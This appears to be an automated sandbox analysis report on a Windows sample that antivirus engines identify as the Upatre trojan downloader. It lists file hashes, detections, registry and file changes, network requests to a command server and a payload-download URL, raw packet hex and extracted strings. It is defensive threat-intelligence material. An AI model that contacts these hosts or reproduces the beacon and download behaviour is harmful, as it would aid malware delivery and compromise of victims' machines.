Analysis Date2015-04-07 17:29:24
MD59b2d754b4966068b05dd147b08ce4eae
SHA1fa34d546ff295dcf0219ef5a382183a724134e77

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 741387be43519c832be664a1aaf47d9b sha1: 598415570c55ec30f4b3f93566168812358c1843 size: 6656
Section.rdata md5: 085fc3b435e3a9ede0c32ec6a8d3b66c sha1: 03dfdd0adf0360a5ff10668aeec39b8225569fc2 size: 1536
Section.data md5: 1d81b13de62ef4318128b9a8c8d2eee2 sha1: 4997cfede9c23c28aa89501f8bb7f0af268d7d3e size: 512
Section.rsrc md5: 7c7bf8baabbb67762814760043a0bd2f sha1: 21ab304121e40eeaafd4248cc9fda58c4f67993f size: 12288
Timestamp2011-08-20 13:05:43
VersionLegalCopyright: Copyright by Sunfull Ind.
InternalName: Sunfull
FileVersion: Version 1.3
CompanyName: Sunfull
FileDescription: Sunfull Ind.
OriginalFilename: Sunfull
PackerBorland Delphi 3.0 (???)
PEhash978854d7ae377b5975860a9c01473d694924b12a
IMPhash27d5b04244fdde75c1e56fee517018cc
AV360 Safeno_virus
AVAd-AwareTrojan.GenericKD.1934234
AVAlwil (avast)Agent-AUKO [Trj]
AVArcabit (arcavir)Trojan.GenericKD.1934234
AVAuthentiumW32/Trojan.DXKV-8011
AVAvira (antivir)TR/ATRAPS.A.1963
AVBullGuardTrojan.GenericKD.1934234
AVCA (E-Trust Ino)Win32/Upatre.eWJAPY
AVCAT (quickheal)TrojanDwnldr.Upatre.AA4
AVClamAVno_virus
AVDr. WebTrojan.Upatre.100
AVEmsisoftTrojan.GenericKD.1934234
AVEset (nod32)Win32/TrojanDownloader.Waski.A
AVFortinetW32/Upatre.BTC!tr
AVFrisk (f-prot)W32/Trojan3.LNK
AVF-SecureTrojan-Downloader:W32/Upatre.I
AVGrisoft (avg)Generic36.AGOK
AVIkarusTrojan-Downloader.Win32.Upatre
AVK7Trojan-Downloader ( 0048f6391 )
AVKaspersky 2015Trojan.Win32.Generic
AVMalwareBytesTrojan.Upatre
AVMcafeeUpatre-FAAA!9B2D754B4966
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Upatre.AA
AVMicroWorld (escan)Trojan.GenericKD.1934234
AVRisingno_virus
AVSophosTroj/Upatre-GJ
AVSymantecDownloader.Upatre
AVTrend MicroTROJ_UPATRE.SM37
AVVirusBlokAda (vba32)TrojanDownloader.Upatre

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\nkbbq.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\nkbbq.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\nkbbq.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNStnldemo.com
Winsock DNScyba3.co.uk
Winsock DNS188.165.214.6

Network Details:

DNScyba3.co.uk
Type: A
94.136.40.103
DNStnldemo.com
Type: A
HTTP GEThttp://188.165.214.6:16600/2010dk4/COMPUTER-XXXXXX/0/51-SP3/0/
User-Agent: testupdate
HTTP GEThttp://188.165.214.6:16600/2010dk4/COMPUTER-XXXXXX/1/0/0/
User-Agent: testupdate
HTTP GEThttp://cyba3.co.uk/site/2010uk4_.osa
User-Agent: testupdate
HTTP GEThttp://cyba3.co.uk/site/2010uk4_.osa
User-Agent: testupdate
Flows TCP192.168.1.1:1031 ➝ 188.165.214.6:16600
Flows TCP192.168.1.1:1031 ➝ 188.165.214.6:16600
Flows TCP192.168.1.1:1032 ➝ 188.165.214.6:16600
Flows TCP192.168.1.1:1033 ➝ 94.136.40.103:80
Flows TCP192.168.1.1:1034 ➝ 94.136.40.103:80

Raw Pcap
0x00000000 (00000)   47455420 2f323031 30646b34 2f434f4d   GET /2010dk4/COM
0x00000010 (00016)   50555445 522d5858 58585858 2f302f35   PUTER-XXXXXX/0/5
0x00000020 (00032)   312d5350 332f302f 20485454 502f312e   1-SP3/0/ HTTP/1.
0x00000030 (00048)   310d0a55 7365722d 4167656e 743a2074   1..User-Agent: t
0x00000040 (00064)   65737475 70646174 650d0a48 6f73743a   estupdate..Host:
0x00000050 (00080)   20313838 2e313635 2e323134 2e363a31    188.165.214.6:1
0x00000060 (00096)   36363030 0d0a4361 6368652d 436f6e74   6600..Cache-Cont
0x00000070 (00112)   726f6c3a 206e6f2d 63616368 650d0a0d   rol: no-cache...
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f323031 30646b34 2f434f4d   GET /2010dk4/COM
0x00000010 (00016)   50555445 522d5858 58585858 2f312f30   PUTER-XXXXXX/1/0
0x00000020 (00032)   2f302f20 48545450 2f312e31 0d0a5573   /0/ HTTP/1.1..Us
0x00000030 (00048)   65722d41 67656e74 3a207465 73747570   er-Agent: testup
0x00000040 (00064)   64617465 0d0a486f 73743a20 3138382e   date..Host: 188.
0x00000050 (00080)   3136352e 3231342e 363a3136 3630300d   165.214.6:16600.
0x00000060 (00096)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000070 (00112)   6e6f2d63 61636865 0d0a0d0a 650d0a0d   no-cache....e...
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f736974 652f3230 3130756b   GET /site/2010uk
0x00000010 (00016)   345f2e6f 73612048 5454502f 312e310d   4_.osa HTTP/1.1.
0x00000020 (00032)   0a416363 6570743a 20746578 742f2a2c   .Accept: text/*,
0x00000030 (00048)   20617070 6c696361 74696f6e 2f2a0d0a    application/*..
0x00000040 (00064)   55736572 2d416765 6e743a20 74657374   User-Agent: test
0x00000050 (00080)   75706461 74650d0a 486f7374 3a206379   update..Host: cy
0x00000060 (00096)   6261332e 636f2e75 6b0d0a43 61636865   ba3.co.uk..Cache
0x00000070 (00112)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x00000080 (00128)   68650d0a 0d0a                         he....

0x00000000 (00000)   47455420 2f736974 652f3230 3130756b   GET /site/2010uk
0x00000010 (00016)   345f2e6f 73612048 5454502f 312e310d   4_.osa HTTP/1.1.
0x00000020 (00032)   0a416363 6570743a 20746578 742f2a2c   .Accept: text/*,
0x00000030 (00048)   20617070 6c696361 74696f6e 2f2a0d0a    application/*..
0x00000040 (00064)   55736572 2d416765 6e743a20 74657374   User-Agent: test
0x00000050 (00080)   75706461 74650d0a 486f7374 3a206379   update..Host: cy
0x00000060 (00096)   6261332e 636f2e75 6b0d0a43 61636865   ba3.co.uk..Cache
0x00000070 (00112)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x00000080 (00128)   68650d0a 0d0a                         he....


Strings
.
3A9651A1
About Sunfull
Balaklava
Cancel
CompanyName
Copyright by Sunfull Ind.
C:\Users\Tony\AppData\Local\Temp\Temp1_report_46570525484165.zip\report_87324343432432.scr
Default 
Default :
FileDescription
FileVersion
FRIENDS
InternalName
LegalCopyright
MS Shell Dlg
OriginalFilename
Riched32.dll
RICHEDIT
Roman
StringFileInfo
Sunfull
Sunfull Ind.
TeenyWiny
Times New 
Translation
VarFileInfo
Version 1.3
VERY clever
View
VS_VERSION_INFO
0@0@00
0E000@
1	c #77A4E0
2	c #679ADC
3	c #7AA6E1
4	c #195CC6
5	c #FC
6	c #8DB2E4
7	c #4885D6
ADVAPI32.dll
</assembly>
<assemblyIdentity
		<assemblyIdentity
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
AVWAf9
b	c #8
bg_col: sepia 
bg_col: transparent 
BROFSH
|	c #8BB3E5
c	c #3D77D0
COMCTL32.dll
CreateFileW
CreateSolidBrush
CreateWindowExW
@.data
d	c #6E9FDD
DefWindowProcW
DeleteObject
</dependency>
<dependency>
	</dependentAssembly>
	<dependentAssembly>
<description></description>
DestroyWindow
DispatchMessageW
@@@@E0@
E@@0000
@@EE@@E@E
E"{R<9	N
ExitProcess
GDI32.dll
GetBkColor
GetCommandLineA
GetMessageW
GetModuleHandleA
GetModuleHandleW
GetProcessHeap
GetStartupInfoA
GetStockObject
GetTempPathW
GetTickCount
       ghij 
HeapAlloc
	However does not remain, and will contain
KERNEL32.dll
        klm 
			language="*"
LoadAcceleratorsW
LoadCursorW
LoadIconW
LoadLibraryW
lstrcatW
lstrcpynW
	name="Company.Product.Name"
			name="Microsoft.Windows.Common-Controls"
name: styleMainWnd 
name: stylePage 
padding: 32 16 
PostQuitMessage
			processorArchitecture="*"
	processorArchitecture="*"
			publicKeyToken="6595b64144ccf1df"
`.rdata
ReadFile
RegCloseKey
RegisterClassExW
RegOpenKeyExA
RegQueryValueExA
see any further changes, except error corrections.
SendMessageW
SetBkColor
SetTextAlign
	some either did not exist, or were not important enough to.
Style [ 
t5YRGX
TextOutW
!This program cannot be run in DOS mode.
TranslateAcceleratorW
TranslateMessage
			type="win32"
	type="win32"
U2%^Fk
USER32.dll
	version="1.0.0.0"
			version="6.0.0.0"
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>